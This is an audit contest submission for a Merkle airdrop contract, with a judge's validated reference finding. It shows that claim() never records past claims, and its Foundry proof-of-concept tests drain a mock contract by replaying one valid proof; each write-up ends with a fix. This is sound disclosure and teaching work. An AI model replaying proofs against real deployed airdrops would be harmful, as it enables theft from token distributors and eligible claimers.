AirDropper
AI First Flight #5
Beginner FriendlyDeFiFoundry
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Missing Double-Claim Protection Allows Repeated Claims to Drain All Airdrop Tokens

mr_antics

Root + Impact

Description

The `MerkleAirdrop` contract is designed so that each eligible address claims their airdrop tokens exactly once by providing a valid merkle proof. The [Uniswap MerkleDistributor](https://github.com/Uniswap/merkle-distributor) that this contract is based on uses a `claimedBitMap` to enforce single-use claims.

The `claim()` function verifies the merkle proof and transfers tokens, but never records that an address has already claimed. There is no `mapping(address => bool)` or bitmap to prevent replaying the same valid proof. Any address with a valid proof can call `claim()` an unlimited number of times, draining the entire token balance of the contract.

// src/MerkleAirdrop.sol
function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable {
if (msg.value != FEE) {
revert MerkleAirdrop__InvalidFeeAmount();
}
bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));
if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {
revert MerkleAirdrop__InvalidProof();
}
emit Claimed(account, amount);
i_airdropToken.safeTransfer(account, amount);
@> // No state update to record that `account` has already claimed
@> // Missing: s_hasClaimed[account] = true;
}

Risk

Likelihood:

  • Any address holding a valid merkle proof will discover that repeated calls succeed, since there is no on-chain state preventing it. Merkle proofs are deterministic and publicly derivable from the known tree.

  • The `claim()` function does not require `msg.sender == account`, so any third party who observes a proof (e.g. from a public transaction or the known address list) can also replay it repeatedly.

Impact:

  • A single claimer (or any third party with a valid proof) can drain 100% of the contract's USDC balance. With 100 USDC funded and 25 USDC per claim, only 4 calls are needed for full drain.

  • All other legitimate claimers receive nothing because the contract balance is zero.

Proof of Concept

Both tests pass:

// SPDX-License-Identifier: MIT
pragma solidity 0.8.24;
import { MerkleAirdrop } from "../src/MerkleAirdrop.sol";
import { AirdropToken } from "./mocks/AirdropToken.sol";
import { Test, console } from "forge-std/Test.sol";
/// @title F-001 PoC: Double Claim — Full Token Drain
/// @notice Demonstrates that a valid merkle proof can be used repeatedly to drain all tokens
contract F001_DoubleClaimTest is Test {
MerkleAirdrop public airdrop;
AirdropToken public token;
// Same merkle root & proof as the existing test (known-good values)
bytes32 public merkleRoot = 0x3b2e22da63ae414086bec9c9da6b685f790c6fab200c7918f2879f08793d77bd;
uint256 amountToCollect = 25 * 1e6; // 25 USDC (6 decimals)
uint256 amountToSend = amountToCollect * 4; // 100 USDC total
address collectorOne = 0x20F41376c713072937eb02Be70ee1eD0D639966C;
bytes32 proofOne = 0x32cee63464b09930b5c3f59f955c86694a4c640a03aa57e6f743d8a3ca5c8838;
bytes32 proofTwo = 0x8ff683185668cbe035a18fccec4080d7a0331bb1bbc532324f40501de5e8ea5c;
bytes32[] proof = [proofOne, proofTwo];
function setUp() public {
token = new AirdropToken();
airdrop = new MerkleAirdrop(merkleRoot, token);
token.mint(address(this), amountToSend);
token.transfer(address(airdrop), amountToSend);
}
/// @notice Prove that collectorOne can claim 4 times and drain all 100 USDC
function test_F001_doubleClaimDrainsAllTokens() public {
uint256 fee = airdrop.getFee();
// Fund collectorOne with enough ETH for 4 claims
vm.deal(collectorOne, fee * 4);
vm.startPrank(collectorOne);
// Claim #1 — should succeed
airdrop.claim{ value: fee }(collectorOne, amountToCollect, proof);
assertEq(token.balanceOf(collectorOne), amountToCollect, "After claim 1");
// Claim #2 — should REVERT if double-claim protection exists, but it doesn't
airdrop.claim{ value: fee }(collectorOne, amountToCollect, proof);
assertEq(token.balanceOf(collectorOne), amountToCollect * 2, "After claim 2");
// Claim #3
airdrop.claim{ value: fee }(collectorOne, amountToCollect, proof);
assertEq(token.balanceOf(collectorOne), amountToCollect * 3, "After claim 3");
// Claim #4 — drains the entire contract
airdrop.claim{ value: fee }(collectorOne, amountToCollect, proof);
assertEq(token.balanceOf(collectorOne), amountToCollect * 4, "After claim 4");
vm.stopPrank();
// Contract is now completely drained
assertEq(token.balanceOf(address(airdrop)), 0, "Contract drained to 0");
console.log("[F-001] PROVEN: collectorOne drained all", amountToSend, "tokens via 4 repeat claims");
}
/// @notice Prove that a non-eligible third party can drain by calling claim() for an eligible address
function test_F001_thirdPartyDrainViaClaimOnBehalf() public {
uint256 fee = airdrop.getFee();
address attacker = makeAddr("attacker");
vm.deal(attacker, fee * 4);
vm.startPrank(attacker);
// Attacker calls claim() with collectorOne's proof — tokens go to collectorOne
// but attacker can repeat this to drain all tokens
airdrop.claim{ value: fee }(collectorOne, amountToCollect, proof);
airdrop.claim{ value: fee }(collectorOne, amountToCollect, proof);
airdrop.claim{ value: fee }(collectorOne, amountToCollect, proof);
airdrop.claim{ value: fee }(collectorOne, amountToCollect, proof);
vm.stopPrank();
// All tokens sent to collectorOne (not attacker), but contract is fully drained
assertEq(token.balanceOf(address(airdrop)), 0, "Contract drained");
assertEq(token.balanceOf(collectorOne), amountToSend, "All tokens to collectorOne");
console.log("[F-001] PROVEN: Third party drained contract by repeatedly claiming on behalf");
}
}

Additionally validated with a 256-run fuzz test confirming 1-20 repeat claims always succeed.

// SPDX-License-Identifier: MIT
pragma solidity 0.8.24;
import { MerkleAirdrop } from "../src/MerkleAirdrop.sol";
import { AirdropToken } from "./mocks/AirdropToken.sol";
import { Test, console } from "forge-std/Test.sol";
/// @title F-001 Triple Validation: Invariant/Fuzz test for double-claim
/// @notice Confirms that repeated claims always succeed (proving the bug)
contract F001_FuzzTest is Test {
MerkleAirdrop public airdrop;
AirdropToken public token;
bytes32 public merkleRoot = 0x3b2e22da63ae414086bec9c9da6b685f790c6fab200c7918f2879f08793d77bd;
uint256 amountToCollect = 25 * 1e6;
address collectorOne = 0x20F41376c713072937eb02Be70ee1eD0D639966C;
bytes32 proofOne = 0x32cee63464b09930b5c3f59f955c86694a4c640a03aa57e6f743d8a3ca5c8838;
bytes32 proofTwo = 0x8ff683185668cbe035a18fccec4080d7a0331bb1bbc532324f40501de5e8ea5c;
bytes32[] proof = [proofOne, proofTwo];
function setUp() public {
token = new AirdropToken();
airdrop = new MerkleAirdrop(merkleRoot, token);
// Mint a large supply so we can test many claims
token.mint(address(this), amountToCollect * 100);
token.transfer(address(airdrop), amountToCollect * 100);
}
/// @notice Fuzz: any number of repeat claims (1-20) succeeds, proving no double-claim guard
function test_F001_fuzz_repeatClaimsAlwaysSucceed(uint8 numClaims) public {
// Bound to reasonable range
uint8 claimCount = uint8(bound(numClaims, 1, 20));
uint256 fee = airdrop.getFee();
vm.deal(collectorOne, fee * uint256(claimCount));
vm.startPrank(collectorOne);
for (uint8 i = 0; i < claimCount; i++) {
airdrop.claim{ value: fee }(collectorOne, amountToCollect, proof);
}
vm.stopPrank();
// Invariant: balance should be exactly claimCount * amountToCollect
// In a secure contract, balance should never exceed 1 * amountToCollect
assertEq(
token.balanceOf(collectorOne),
uint256(claimCount) * amountToCollect,
"Collector received more than 1 claim worth"
);
if (claimCount > 1) {
// This proves the invariant violation: user has more than their allocation
assertTrue(
token.balanceOf(collectorOne) > amountToCollect,
"BUG CONFIRMED: user claimed more than their allocation"
);
}
}
}

Recommended Mitigation

+ error MerkleAirdrop__AlreadyClaimed();
+
+ mapping(address => bool) private s_hasClaimed;
function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable {
+ if (s_hasClaimed[account]) {
+ revert MerkleAirdrop__AlreadyClaimed();
+ }
if (msg.value != FEE) {
revert MerkleAirdrop__InvalidFeeAmount();
}
bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));
if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {
revert MerkleAirdrop__InvalidProof();
}
+ s_hasClaimed[account] = true;
emit Claimed(account, amount);
i_airdropToken.safeTransfer(account, amount);
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-02] Eligible users can claim their airdrop amounts over and over again, draining the contract

## Description A user eligible for the airdrop can verify themselves as being part of the merkle tree and claim their airdrop amount. However, there is no mechanism enabled to track the users who have already claimed their airdrop, and the merkle tree is still composed of the same user. This allows users to drain the `MerkleAirdrop` contract by calling the `MerkleAirdrop::claim()` function over and over again. ## Impact **Severity: High**<br/>**Likelihood: High** A malicious user can call the `MerkleAirdrop::claim()` function over and over again until the contract is drained of all its funds. This also means that other users won't be able to claim their airdrop amounts. ## Proof of Code Add the following test to `./test/MerkleAirdrop.t.sol`, ```javascript function testClaimAirdropOverAndOverAgain() public { vm.deal(collectorOne, airdrop.getFee() * 4); for (uint8 i = 0; i < 4; i++) { vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); } assertEq(token.balanceOf(collectorOne), 100e6); } ``` The test passes, and the malicious user has drained the contract of all its funds. ## Recommended Mitigation Use a mapping to store the addresses that have claimed their airdrop amounts. Check and update this mapping each time a user tries to claim their airdrop amount. ```diff contract MerkleAirdrop is Ownable { using SafeERC20 for IERC20; error MerkleAirdrop__InvalidFeeAmount(); error MerkleAirdrop__InvalidProof(); error MerkleAirdrop__TransferFailed(); + error MerkleAirdrop__AlreadyClaimed(); uint256 private constant FEE = 1e9; IERC20 private immutable i_airdropToken; bytes32 private immutable i_merkleRoot; + mapping(address user => bool claimed) private s_hasClaimed; ... function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable { + if (s_hasClaimed[account]) revert MerkleAirdrop__AlreadyClaimed(); if (msg.value != FEE) { revert MerkleAirdrop__InvalidFeeAmount(); } bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount)))); if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) { revert MerkleAirdrop__InvalidProof(); } + s_hasClaimed[account] = true; emit Claimed(account, amount); i_airdropToken.safeTransfer(account, amount); } ``` Now, let's unit test the changes, ```javascript function testCannotClaimAirdropMoreThanOnceAnymore() public { vm.deal(collectorOne, airdrop.getFee() * 2); vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); } ``` The test correctly fails, with the following logs, ```shell Failing tests: Encountered 1 failing test in test/MerkleAirdropTest.t.sol:MerkleAirdropTest [FAIL. Reason: MerkleAirdrop__AlreadyClaimed()] testCannotClaimAirdropMoreThanOnceAnymore() (gas: 96751) ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!